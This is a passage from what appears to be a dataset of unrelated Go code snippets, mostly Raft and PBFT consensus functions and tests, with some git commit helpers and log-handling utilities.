!stabilized {\n\t\t\tstabilized = true\n\t\t\tif clusterChangeIndex > msg.PrevLogIndex {\n\t\t\t\tstabilized = false\n\t\t\t\tcontainsClusterChange = true\n\t\t\t\tentry, _ := log.Get(clusterChangeIndex)\n\t\t\t\trecord := &iface.ClusterChangeCommand{}\n\t\t\t\tjson.Unmarshal(entry.Command, &record)\n\t\t\t\tclusterChangeIndex = record.OldClusterChangeIndex\n\t\t\t\tclusterChangeTerm = record.OldClusterChangeTerm\n\t\t\t\tcluster = record.OldCluster\n\t\t\t}\n\t\t}\n\n\t\t// if deletion detected, rewind to previous configuration\n\t\tif containsClusterChange {\n\t\t\tactions = append(actions, iface.ActionSetClusterChange{\n\t\t\t\tNewClusterChangeIndex: clusterChangeIndex,\n\t\t\t\tNewClusterChangeTerm: clusterChangeTerm,\n\t\t\t})\n\t\t\tpeers := []iface.PeerAddress{}\n\t\t\tfor _, addr := range cluster {\n\t\t\t\tif addr != status.NodeAddress() {\n\t\t\t\t\tpeers = append(peers, addr)\n\t\t\t\t}\n\t\t\t}\n\t\t\tactions = append(actions, iface.ActionSetPeers{\n\t\t\t\tPeerAddresses: peers,\n\t\t\t})\n\t\t}\n\n\t\t// append all entries sent by leader\n\t\tactions = append(actions, iface.ActionAppendLog{\n\t\t\tEntries: msg.Entries,\n\t\t})\n\n\t\t// once again, take care ! Maybe we are adding some entry\n\t\t// describing a cluster change. In such a case, we must apply\n\t\t// the new cluster configuration to ourselves (specifically,\n\t\t// the last cluster configuration among the new entries)\n\t\tfor index := len(msg.Entries) - 1; index >= 0; index-- {\n\t\t\tif msg.Entries[index].Kind != iface.EntryAddServer &&\n\t\t\t\tmsg.Entries[index].Kind != iface.EntryRemoveServer {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\trecord := &iface.ClusterChangeCommand{}\n\t\t\tjson.Unmarshal(msg.Entries[index].Command, &record)\n\t\t\tactions = append(actions, iface.ActionSetClusterChange{\n\t\t\t\tNewClusterChangeIndex: msg.PrevLogIndex + int64(index+1),\n\t\t\t\tNewClusterChangeTerm: msg.Entries[index].Term,\n\t\t\t})\n\t\t\tpeers := []iface.PeerAddress{}\n\t\t\tfor _, addr := range record.NewCluster {\n\t\t\t\tif addr != status.NodeAddress() {\n\t\t\t\t\tpeers = append(peers, addr)\n\t\t\t\t}\n\t\t\t}\n\t\t\tactions = append(actions, iface.ActionSetPeers{\n\t\t\t\tPeerAddresses: peers,\n\t\t\t})\n\t\t\tbreak\n\t\t}\n\n\t}\n\n\t// if leader has committed more than we know, update our index\n\t// and demand state-machine application\n\tif msg.LeaderCommitIndex > status.CommitIndex() {\n\t\tactions = append(actions, iface.ActionSetCommitIndex{\n\t\t\tNewCommitIndex: int64(math.Min(\n\t\t\t\tfloat64(msg.LeaderCommitIndex),\n\t\t\t\tfloat64(msg.PrevLogIndex+int64(len(msg.Entries))),\n\t\t\t)),\n\t\t})\n\t\t// order the state machine to apply the new committed entries\n\t\t// (only if they are state machine commands)\n\t\t// TODO: Treat configuration change\n\t\tfor index := status.CommitIndex() + 1; index < msg.LeaderCommitIndex; index++ {\n\t\t\tvar entry *iface.LogEntry\n\n\t\t\t// get from my log\n\t\t\tif index <= msg.PrevLogIndex {\n\t\t\t\tentry, _ = log.Get(index)\n\n\t\t\t\t// get from leader\n\t\t\t} else {\n\t\t\t\tentry = &msg.Entries[index-msg.PrevLogIndex-1]\n\t\t\t}\n\n\t\t\tswitch entry.Kind {\n\t\t\tcase iface.EntryStateMachineCommand:\n\t\t\t\tactions = append(actions, iface.ActionStateMachineApply{\n\t\t\t\t\tEntryIndex: index,\n\t\t\t\t})\n\t\t\t}\n\t\t}\n\t}\n\n\treturn actions\n}", "func (tester *FollowTester) follow(t *testing.T, d *Dandelion) {\n\ta := assert.New(t)\n\ta.NoError(tester.acc0.SendTrxAndProduceBlock(Follow(tester.acc0.Name, tester.acc1.Name, false)))\n}", "func TestSquashCommitSetPropagation(t *testing.T) {\n\t// TODO(2.0 optional): Implement put file split in V2.\n\tt.Skip(\"Put file split not implemented in V2\")\n\t// \tif testing.Short() {\n\t// \t\tt.Skip(\"Skipping integration tests in short mode\")\n\t// \t}\n\n\t// \tc := tu.GetPachClient(t)\n\t// \trequire.NoError(t, c.DeleteAll())\n\n\t// \t// Create an input repo\n\t// \trepo := tu.UniqueString(\"TestSquashCommitSetPropagation\")\n\t// \trequire.NoError(t, c.CreateProjectRepo(pfs.DefaultProjectName,repo))\n\t// \t_, err := c.PutFileSplit(repo, \"master\", \"d\", pfs.Delimiter_SQL, 0, 0, 0, false,\n\t// \t\tstrings.NewReader(tu.TestPGDump))\n\t// \trequire.NoError(t, err)\n\n\t// \t// Create a pipeline that roughly validates the header\n\t// \tpipeline := tu.UniqueString(\"TestSplitFileReprocessPL\")\n\t// \trequire.NoError(t, c.CreateProjectPipeline(pfs.DefaultProjectName,\n\t// \t\tpipeline,\n\t// \t\t\"\",\n\t// \t\t[]string{\"/bin/bash\"},\n\t// \t\t[]string{\n\t// \t\t\t`ls /pfs/*/d/*`, // for debugging\n\t// \t\t\t`cars_tables=\"$(grep \"CREATE TABLE public.cars\" /pfs/*/d/* | sort -u | wc -l)\"`,\n\t// \t\t\t`(( cars_tables == 1 )) && exit 0 || exit 1`,\n\t// \t\t},\n\t// \t\t&pps.ParallelismSpec{Constant: 1},\n\t// \t\tclient.NewProjectPFSInput(pfs.DefaultProjectName,repo, \"/d/*\"),\n\t// \t\t\"\",\n\t// \t\tfalse,\n\t// \t))\n\n\t// \t// wait for job to run & check that all rows were processed\n\t// \tvar jobCount int\n\t// \tc.FlushJob([]*pfs.Commit{client.NewProjectCommit(pfs.DefaultProjectName,repo, \"master\")}, nil,\n\t// \t\tfunc(jobInfo *pps.JobInfo) error {\n\t// \t\t\tjobCount++\n\t// \t\t\trequire.Equal(t, 1, jobCount)\n\t// \t\t\trequire.Equal(t, pps.JobState_JOB_SUCCESS, jobInfo.State)\n\t// \t\t\trequire.Equal(t, int64(5), jobInfo.DataProcessed)\n\t// \t\t\trequire.Equal(t, int64(0), jobInfo.DataSkipped)\n\t// \t\t\treturn nil\n\t// \t\t})\n\n\t// \t// put empty dataset w/ new header\n\t// \t_, err = c.PutFileSplit(repo, \"master\", \"d\", pfs.Delimiter_SQL, 0, 0, 0, false,\n\t// \t\tstrings.NewReader(tu.TestPGDumpNewHeader))\n\t// \trequire.NoError(t, err)\n\n\t// \t// everything gets reprocessed (hashes all change even though the files\n\t// \t// themselves weren't altered)\n\t// \tjobCount = 0\n\t// \tc.FlushJob([]*pfs.Commit{client.NewProjectCommit(pfs.DefaultProjectName,repo, \"master\")}, nil,\n\t// \t\tfunc(jobInfo *pps.JobInfo) error {\n\t// \t\t\tjobCount++\n\t// \t\t\trequire.Equal(t, 1, jobCount)\n\t// \t\t\trequire.Equal(t, pps.JobState_JOB_SUCCESS, jobInfo.State)\n\t// \t\t\trequire.Equal(t, int64(5), jobInfo.DataProcessed) // added 3 new rows\n\t// \t\t\trequire.Equal(t, int64(0), jobInfo.DataSkipped)\n\t// \t\t\treturn nil\n\t// \t\t})\n}", "func GitCommit(tb testing.TB, msg string) {\n\ttb.Helper()\n\tout, err := fakeGit(\"commit\", \"--allow-empty\", \"-m\", msg)\n\trequire.NoError(tb, err)\n\trequire.Contains(tb, out, \"main\", msg)\n}", "func TestParseCommitData(t *testing.T) {\n\tstr := \"tree 47e960bd3b10e549716c31badb1fc06aacd708e1\\n\" +\n\t\t\"author Artiom <[email protected]> 1379666165 +0300\" +\n\t\t\"committer Artiom <[email protected]> 1379666165 +0300\\n\\n\" +\n\t\t\"if case if ClientForAction will return error, client can absent (be nil)\\n\\n\" +\n\t\t\"Conflicts:\\n\" +\n\t\t\"\tapp/class.js\\n\"\n\n\tcommit, _ := parseCommitData([]byte(str))\n\n\tif commit.treeId.String() != \"47e960bd3b10e549716c31badb1fc06aacd708e1\" {\n\t\tt.Fatalf(\"Got bad tree %s\", commit.treeId)\n\t}\n}", "func TestCommitConflictRollback4A(t *testing.T) {\n}", "func TestCommitOrder2(t *testing.T) {\n\ttest := NewTest(t, \"commit_order2\")\n\tgot := test.Run(nil)\n\n\tc1 := \"d1ae279323d0c7bc9fe9ee101edeccdf9d992412\"\n\tc2 := \"781215b9c139709e2d21130ddeb2e2ff8c2bbf9a\"\n\tc3 := \"a4e51b6d862f44e3674df0e6279eb60dd544d2f5\"\n\n\twant := []process.Result{\n\t\t{\n\t\t\tCommit: c1,\n\t\t\tFiles: map[string]*incblame.Blame{\n\t\t\t\t\"a.txt\": file(c1,\n\t\t\t\t\tline(`a`, c1),\n\t\t\t\t\tline(`a`, c1),\n\t\t\t\t),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tCommit: c2,\n\t\t\tFiles: map[string]*incblame.Blame{\n\t\t\t\t\"a.txt\": file(c2,\n\t\t\t\t\tline(`a`, c1),\n\t\t\t\t),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tCommit: c3,\n\t\t\tFiles: map[string]*incblame.Blame{},\n\t\t},\n\t}\n\tassertResult(t, want, got)\n}", "func (rf *Raft) initRaftNodeToFollower(logCapacity int) {\n rf.mu.Lock()\n defer rf.mu.Unlock()\n\n rf.state = \"Follower\"\n\n rf.currentTerm = 0\n rf.votedFor = -1\n rf.log = make([]Entry, 1, logCapacity)\n rf.log[0].Term = 0\n\n rf.commitIndex = 0\n rf.lastApplied = 0\n\n rf.electionTime = generateElectionTime()\n rf.electionTimer = time.NewTimer(time.Duration(rf.electionTime) * time.Millisecond)\n\n rf.nextIndex = make([]int, len(rf.peers))\n rf.matchIndex = make([]int, len(rf.peers))\n for i:=0; i<len(rf.peers); i++ {\n rf.nextIndex[i] = len(rf.log)\n rf.matchIndex[i] = 0\n }\n\n rf.snapshottedIndex = 0\n}", "func (f *TPCFollower) replayJournal() error {\n\tf.mux.Lock()\n\tdefer f.mux.Unlock()\n\n\tif f.journal.Size() == 0 {\n\t\tglog.Infof(\"tpc follower %s has no journal to replay\", f.name)\n\t\treturn nil\n\t}\n\n\tglog.Infof(\"tpc follower %s replaying journal\", f.name)\n\tvar entryIterator *journal.EntryIterator = f.journal.NewIterator()\n\tvar key, value string\n\tvar action tpc_pb.Action\n\n\tfor {\n\t\t// terminate the loop when there's no more entry\n\t\tentry, err := entryIterator.Next()\n\t\tif err != nil {\n\t\t\tbreak\n\t\t}\n\t\t/*\n\t\t since the leader should handle one operation at a time, there could be\n\t\t at most one incompleted operation. Therefore we traverse the journal and\n\t\t ignore the intermediate logs, until we arrive at the end of the journal\n\t\t and have fetched the latest state of the server\n\t\t*/\n\t\tkey, value, action = entry.Key, entry.Value, entry.Action\n\t}\n\n\tif action == tpc_pb.Action_ACK {\n\t\t/*\n\t\t\t if the last journal log was an ACK, the follower didn't have an incomplete\n\t\t\t\ttransaction, so it can be reset to the initial state, and its journal can\n\t\t\t\tbe cleared\n\t\t*/\n\t\tf.pendingEntry = journal.Entry{}\n\t\tf.state = TPC_INIT\n\t\tf.journal.Empty()\n\t} else {\n\t\t/*\n\t\t\tif the last journal log was a PREPARE, the follower exited after receiving\n\t\t\tthe vote request. Regardless of whether the follower returned a response,\n\t\t\tthe leader can make a global decision. Else if the last journal log was\n\t\t\tan ABORT or COMMIT, the follower exited after receiving the global request.\n\n\t\t\tIn either case, the follower hasn't received or responded to the leader's\n\t\t\tglobal message, so it must wait for the global message in order to continue\n\t\t\ton the transaction.\n\n\t\t\tTherefore, all cases here should have the follower's pending entry\n\t\t\tpopulated and its state changed to TPC_READY, to prepare for\n\t\t\tthe leader's global request.\n\t\t*/\n\t\tf.pendingEntry.Key, f.pendingEntry.Value, f.pendingEntry.Action = key, value, action\n\t\tf.state = TPC_READY\n\t}\n\n\tglog.Infof(\"tpc follower %s finished replaying journal\", f.name)\n\treturn nil\n}", "func (l *leader) applyCommitted() {\n\t// add all entries <=commitIndex & add only non-log entries at commitIndex+1\n\tvar prev, ne *newEntry = nil, l.neHead\n\tfor ne != nil {\n\t\tif ne.index <= l.commitIndex {\n\t\t\tprev, ne = ne, ne.next\n\t\t} else if ne.index == l.commitIndex+1 && !ne.isLogEntry() {\n\t\t\tprev, ne = ne, ne.next\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\tvar head *newEntry\n\tif prev != nil {\n\t\thead = l.neHead\n\t\tprev.next = nil\n\t\tl.neHead = ne\n\t\tif l.neHead == nil {\n\t\t\tl.neTail = nil\n\t\t}\n\t}\n\n\tapply := fsmApply{head, l.log.ViewAt(l.log.PrevIndex(), l.commitIndex)}\n\tif trace {\n\t\tprintln(l, apply)\n\t}\n\tl.fsm.ch <- apply\n}", "func (rf *Raft) updateLastCommit() {\n\t// rf.lock(\"updateLastCommit\")\n\t// defer rf.unlock(\"updateLastCommit\")\n\tmatchIndexCopy := make([]int, len(rf.matchIndex))\n\tcopy(matchIndexCopy, rf.matchIndex)\n\t// for i := range rf.matchIndex {\n\t//\tDPrintf(\"matchIndex[%d] is %d\", i, rf.matchIndex[i])\n\t// }\n\n\t// sort.Sort(sort.IntSlice(matchIndexCopy))\n\tsort.Sort(sort.Reverse(sort.IntSlice(matchIndexCopy)))\n\tN := matchIndexCopy[len(matchIndexCopy)/2]\n\t// for i := range rf.log {\n\t//\tDPrintf(\"server[%d] %v\", rf.me, rf.log[i])\n\t// }\n\t// for i := range rf.matchIndex {\n\t// \tDPrintf(\"server[%d]'s matchindex is %v\", i, rf.matchIndex[i])\n\t// }\n\t// Check\n\tN = Min(N, rf.getLastIndex())\n\n\tif N > rf.commitIndex && rf.log[N].LogTerm == rf.currentTerm && rf.state == LEADER {\n\t\trf.commitIndex = N\n\t\t// DPrintf(\"updateLastCommit from server[%d]\", rf.me)\n\t\trf.notifyApplyCh <- struct{}{}\n\n\t}\n\n}", "func Follow(r cruntime.Manager, bs bootstrapper.Bootstrapper, cfg config.ClusterConfig, cr logRunner, logOutput io.Writer) error {\n\tcs := []string{}\n\tfor _, v := range logCommands(r, bs, cfg, 0, true) {\n\t\tcs = append(cs, v+\" &\")\n\t}\n\tcs = append(cs, \"wait\")\n\n\tcmd := exec.Command(\"/bin/bash\", \"-c\", strings.Join(cs, \" \"))\n\tcmd.Stdout = logOutput\n\tcmd.Stderr = logOutput\n\tif _, err := cr.RunCmd(cmd); err != nil {\n\t\treturn errors.Wrapf(err, \"log follow\")\n\t}\n\treturn nil\n}", "func (r *Raft) AppendToLog_Follower(request AppendEntriesReq) {\n\tTerm := request.LeaderLastLogTerm\n\tcmd := request.Entries\n\tindex := request.PrevLogIndex + 1\n\tlogVal := LogVal{Term, cmd, 0} //make object for log's value field\n\n\tif len(r.MyLog) == index {\n\t\tr.MyLog = append(r.MyLog, logVal) //when trying to add a new entry\n\t} else {\n\t\tr.MyLog[index] = logVal //overwriting in case of log repair\n\t}\n\n\tr.MyMetaData.LastLogIndex = index\n\tr.MyMetaData.PrevLogIndex = index - 1\n\tif index == 0 {\n\t\tr.MyMetaData.PrevLogTerm = r.MyMetaData.PrevLogTerm + 1 //or simple -1\n\t} else if index >= 1 {\n\t\tr.MyMetaData.PrevLogTerm = r.MyLog[index-1].Term\n\t}\n\tleaderCI := float64(request.LeaderCommitIndex) //Update commit index\n\tmyLI := float64(r.MyMetaData.LastLogIndex)\n\tif request.LeaderCommitIndex > r.MyMetaData.CommitIndex {\n\t\tr.MyMetaData.CommitIndex = int(math.Min(leaderCI, myLI))\n\t}\n\tr.WriteLogToDisk()\n}", "func (r *Raft) runFollower() {\n\tfor {\n\t\tselect {\n\t\tcase rpc := <-r.rpcCh:\n\t\t\t// Handle the command\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\tr.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\tr.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"In follower state, got unexpected command: %#v\", rpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\t\tcase a := <-r.applyCh:\n\t\t\t// Reject any operations since we are not the leader\n\t\t\ta.response = ErrNotLeader\n\t\t\ta.Response()\n\t\tcase <-randomTimeout(r.conf.HeartbeatTimeout, r.conf.ElectionTimeout):\n\t\t\t// Heartbeat failed! Go to the candidate state\n\t\t\tr.logW.Printf(\"Heartbeat timeout, start election process\")\n\t\t\tr.setState(Candidate)\n\t\t\treturn\n\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func TestBcastBeat(t *testing.T) {\n\toffset := uint64(1000)\n\t// make a state machine with log.offset = 1000\n\tpeerGrps := make([]*pb.Group, 0)\n\tfor _, pid := range []uint64{1, 2, 3} {\n\t\tgrp := pb.Group{\n\t\t\tNodeId: pid,\n\t\t\tRaftReplicaId: pid,\n\t\t\tGroupId: 1,\n\t\t}\n\t\tpeerGrps = append(peerGrps, &grp)\n\t}\n\n\ts := pb.Snapshot{\n\t\tMetadata: pb.SnapshotMetadata{\n\t\t\tIndex: offset,\n\t\t\tTerm: 1,\n\t\t\tConfState: pb.ConfState{Nodes: []uint64{1, 2, 3}, Groups: peerGrps},\n\t\t},\n\t}\n\tstorage := NewMemoryStorage()\n\tstorage.ApplySnapshot(s)\n\tsm := newTestRaft(1, nil, 10, 1, storage)\n\tdefer closeAndFreeRaft(sm)\n\tsm.Term = 1\n\n\tsm.becomeCandidate()\n\tsm.becomeLeader()\n\tfor i := 0; i < 10; i++ {\n\t\tsm.appendEntry(pb.Entry{Index: uint64(i) + 1})\n\t}\n\t// slow follower\n\tsm.prs[2].Match, sm.prs[2].Next = 5, 6\n\t// normal follower\n\tsm.prs[3].Match, sm.prs[3].Next = sm.raftLog.lastIndex(), sm.raftLog.lastIndex()+1\n\n\tsm.Step(pb.Message{Type: pb.MsgBeat})\n\tmsgs := sm.readMessages()\n\tif len(msgs) != 2 {\n\t\tt.Fatalf(\"len(msgs) = %v, want 2\", len(msgs))\n\t}\n\twantCommitMap := map[uint64]uint64{\n\t\t2: min(sm.raftLog.committed, sm.prs[2].Match),\n\t\t3: min(sm.raftLog.committed, sm.prs[3].Match),\n\t}\n\tfor i, m := range msgs {\n\t\tif m.Type != pb.MsgHeartbeat {\n\t\t\tt.Fatalf(\"#%d: type = %v, want = %v\", i, m.Type, pb.MsgHeartbeat)\n\t\t}\n\t\tif m.Index != 0 {\n\t\t\tt.Fatalf(\"#%d: prevIndex = %d, want %d\", i, m.Index, 0)\n\t\t}\n\t\tif m.LogTerm != 0 {\n\t\t\tt.Fatalf(\"#%d: prevTerm = %d, want %d\", i, m.LogTerm, 0)\n\t\t}\n\t\tif wantCommitMap[m.To] == 0 {\n\t\t\tt.Fatalf(\"#%d: unexpected to %d\", i, m.To)\n\t\t} else {\n\t\t\tif m.Commit != wantCommitMap[m.To] {\n\t\t\t\tt.Fatalf(\"#%d: commit = %d, want %d\", i, m.Commit, wantCommitMap[m.To])\n\t\t\t}\n\t\t\tdelete(wantCommitMap, m.To)\n\t\t}\n\t\tif len(m.Entries) != 0 {\n\t\t\tt.Fatalf(\"#%d: len(entries) = %d, want 0\", i, len(m.Entries))\n\t\t}\n\t}\n}", "func (self *WAL) Commit(requestNumber uint32, serverId uint32) error {\n\tconfirmationChan := make(chan *confirmation)\n\tself.entries <- &commitEntry{confirmationChan, serverId, requestNumber}\n\tconfirmation := <-confirmationChan\n\treturn confirmation.err\n}", "func (t TestRepo) Commit(treeID *git.Oid) *git.Oid {\n\tloc, err := time.LoadLocation(\"America/Chicago\")\n\tCheckFatal(t.test, err)\n\tsig := &git.Signature{\n\t\tName: \"Rand Om Hacker\",\n\t\tEmail: \"[email protected]\",\n\t\tWhen: time.Date(2013, 03, 06, 14, 30, 0, 0, loc),\n\t}\n\n\theadUnborn, err := t.repo.IsHeadUnborn()\n\tCheckFatal(t.test, err)\n\tvar currentTip *git.Commit\n\n\tif !headUnborn {\n\t\tcurrentBranch, err := t.repo.Head()\n\t\tCheckFatal(t.test, err)\n\t\tcurrentTip, err = t.repo.LookupCommit(currentBranch.Target())\n\t\tCheckFatal(t.test, err)\n\t}\n\n\tmessage := \"This is a commit\\n\"\n\ttree, err := t.repo.LookupTree(treeID)\n\tCheckFatal(t.test, err)\n\n\tvar commitID *git.Oid\n\tif headUnborn {\n\t\tcommitID, err = t.repo.CreateCommit(\"HEAD\", sig, sig, message, tree)\n\t} else {\n\t\tcommitID, err = t.repo.CreateCommit(\"HEAD\", sig, sig, message, tree,\n\t\t\tcurrentTip)\n\t}\n\tCheckFatal(t.test, err)\n\n\treturn commitID\n}", "func (_RandomBeacon *RandomBeaconTransactor) SubmitRelayEntry(opts *bind.TransactOpts, entry []byte, groupMembers []uint32) (*types.Transaction, error) {\n\treturn _RandomBeacon.contract.Transact(opts, \"submitRelayEntry\", entry, groupMembers)\n}", "func TestFollowerVote(t *testing.T) {\n\ttests := []struct {\n\t\tvote uint64\n\t\tnvote uint64\n\t\twreject bool\n\t}{\n\t\t{None, 1, false},\n\t\t{None, 2, false},\n\t\t{1, 1, false},\n\t\t{2, 2, false},\n\t\t{1, 2, true},\n\t\t{2, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Term: 1, Vote: tt.vote})\n\n\t\tr.Step(pb.Message{From: tt.nvote, FromGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTerm: 1, Type: pb.MsgVote})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: tt.nvote, ToGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\t\tTerm: 1, Type: pb.MsgVoteResp, Reject: tt.wreject},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %v, want %v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func TestLeaderTransferSecondTransferToAnotherNode(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\t// Transfer leadership to another node.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n}", "func (s *PBFTServer) Commit(args CommitArgs, reply *CommitReply) error {\n\t// Verify signature\n\n\ts.lock.Lock()\n\n\ts.stopTimer()\n\n\tif !s.changing && s.view == args.View && s.h <= args.Seq && args.Seq < s.H {\n\t\tent := s.getEntry(entryID{args.View, args.Seq})\n\t\ts.lock.Unlock()\n\n\t\tent.lock.Lock()\n\t\tent.c = append(ent.c, &args)\n\t\tUtil.Dprintf(\"%s[R/Commit]:Args:%+v\", s, args)\n\t\tif !ent.sendReply && ent.sendCommit && s.committed(ent) {\n\t\t\tUtil.Dprintf(\"%s start execute %v @ %v\", s, ent.pp.Message.Op, args.Seq)\n\t\t\t// Execute will make sure there only one execution of one request\n\t\t\tres, _ := s.execute(args.Seq, ent.pp.Message.Op, args.Digest)\n\t\t\tif ent.r == nil {\n\t\t\t\trArgs := ResponseArgs{\n\t\t\t\t\tView: args.View,\n\t\t\t\t\tSeq: ent.pp.Message.Seq,\n\t\t\t\t\tCid: ent.pp.Message.Id,\n\t\t\t\t\tRid: s.id,\n\t\t\t\t\tRes: res,\n\t\t\t\t}\n\t\t\t\tent.r = &rArgs\n\t\t\t}\n\t\t\tent.sendReply = true\n\t\t}\n\t\ts.reply(ent)\n\t\tent.lock.Unlock()\n\t} else {\n\t\ts.lock.Unlock()\n\t}\n\treturn nil\n}", "func (s *OrderServer) processCommit() {\n\tfor e := range s.commitC {\n\t\tif s.isLeader {\n\t\t\tlog.Debugf(\"%v\", e)\n\t\t}\n\t\ts.subCMu.RLock()\n\t\tfor _, c := range s.subC {\n\t\t\tc <- e\n\t\t}\n\t\ts.subCMu.RUnlock()\n\t}\n}", "func TestHeadEvents(t *testing.T) {\n\ttf.UnitTest(t)\n\n\tctx := context.Background()\n\tbuilder := chain.NewBuilder(t, address.Undef)\n\tgenTS := builder.Genesis()\n\tchainStore := newChainStore(builder.Repo(), genTS)\n\t// Construct test chain data\n\tlink1 := builder.AppendOn(ctx, genTS, 2)\n\tlink2 := builder.AppendOn(ctx, link1, 3)\n\tlink3 := builder.AppendOn(ctx, link2, 1)\n\tlink4 := builder.BuildOn(ctx, link3, 2, func(bb *chain.BlockBuilder, i int) { bb.IncHeight(2) })\n\tchA := chainStore.Store.SubHeadChanges(ctx)\n\tchB := chainStore.Store.SubHeadChanges(ctx)\n\t// HCurrent\n\t<-chA\n\t<-chB\n\n\tdefer ctx.Done()\n\n\theadSets := []*types.TipSet{genTS, link1, link2, link3, link4, link3, link2, link1, genTS}\n\theads := []*types.TipSet{genTS, link1, link2, link3, link4, link4, link3, link2, link1}\n\ttypes := []types.HeadChangeType{\n\t\ttypes.HCApply, types.HCApply, types.HCApply, types.HCApply, types.HCApply, types.HCRevert,\n\t\ttypes.HCRevert, types.HCRevert, types.HCRevert,\n\t}\n\twaitAndCheck := func(index int) {\n\t\theadA := <-chA\n\t\theadB := <-chB\n\t\tassert.Equal(t, headA[0].Type, types[index])\n\t\ttest.Equal(t, headA, headB)\n\t\ttest.Equal(t, headA[0].Val, heads[index])\n\t}\n\n\t// Heads arrive in the expected order\n\tfor i := 0; i < 9; i++ {\n\t\tassertSetHead(t, chainStore, headSets[i])\n\t\twaitAndCheck(i)\n\t}\n\t// No extra notifications\n\tassertEmptyCh(t, chA)\n\tassertEmptyCh(t, chB)\n}", "func TestRaftRemoveLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tID3 := \"3\"\n\tclusterPrefix := \"TestRaftRemoveLeader\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\t// Create n3.\n\tfsm3 := newTestFSM(ID3)\n\tn3 := testCreateRaftNode(getTestConfig(ID3, clusterPrefix+ID3), newStorage())\n\n\tconnectAllNodes(n1, n2, n3)\n\n\t// The cluster starts with only one node -- n1.\n\tn1.Start(fsm1)\n\tn1.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes to leader.\n\t<-fsm1.leaderCh\n\n\t// Add n2 to the cluster.\n\tpending := n1.AddNode(ID2)\n\tn2.Start(fsm2)\n\t// Wait until n2 gets joined.\n\t<-pending.Done\n\n\t// Add n3 to the cluster.\n\tpending = n1.AddNode(ID3)\n\tn3.Start(fsm3)\n\t// Wait until n3 gets joined.\n\t<-pending.Done\n\n\t// Now we have a cluster with 3 nodes and n1 as the leader.\n\n\t// Remove the leader itself.\n\tn1.RemoveNode(ID1)\n\n\t// A new leader should be elected in new configuration(n2, n3).\n\tvar newLeader *Raft\n\tselect {\n\tcase <-fsm2.leaderCh:\n\t\tnewLeader = n2\n\tcase <-fsm3.leaderCh:\n\t\tnewLeader = n1\n\t}\n\n\tnewLeader.Propose([]byte(\"data1\"))\n\tnewLeader.Propose([]byte(\"data2\"))\n\tnewLeader.Propose([]byte(\"data3\"))\n\n\t// Now n2 and n3 should commit newly proposed entries eventually>\n\tif !testEntriesEqual(fsm2.appliedCh, fsm3.appliedCh, 3) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func TestCommitterParentFailure(t *testing.T) {\n\te := []*transformer.Envelope{\n\t\t&transformer.Envelope{},\n\t\t&transformer.Envelope{},\n\t\t&transformer.Envelope{},\n\t}\n\n\texp := errors.New(\"OH MY GOD EVERYTHING IS BURNING\")\n\tok := true\n\tc := NewCommitter(&dumbWriter{exp}, func(envs []*transformer.Envelope) error {\n\t\tok = false\n\t\treturn nil\n\t})\n\n\terr := c.Write(e...)\n\tif err != exp {\n\t\tt.Fatalf(\"unexpected error %v\", err)\n\t}\n\tif !ok {\n\t\tt.Fatal(\"commit callback invoked unexpectedly\")\n\t}\n}", "func (tc *consumer) Commit(topic string, partition int32, offset int64) error {\n\treturn nil\n}", "func (rf *Raft) BeFollower(term int) {\n\t//////fmt.Print(\"%d become follower\\n\", rf.me)\n\trf.state = Follower\n\trf.currentTerm = term\n\trf.votedFor = NULL\n}", "func (cs *ConsensusState) enterCommit(height int64, commitRound int) {\n\tif cs.Height != height || ttypes.RoundStepCommit <= cs.Step {\n\t\tqbftlog.Debug(fmt.Sprintf(\"enterCommit(%v/%v): Invalid args. Current step: %v/%v/%v\", height, commitRound, cs.Height, cs.Round, cs.Step))\n\t\treturn\n\t}\n\tqbftlog.Info(fmt.Sprintf(\"enterCommit(%v/%v). Current: %v/%v/%v\", height, commitRound, cs.Height, cs.Round, cs.Step), \"cost\", types.Since(cs.begCons))\n\n\tdefer func() 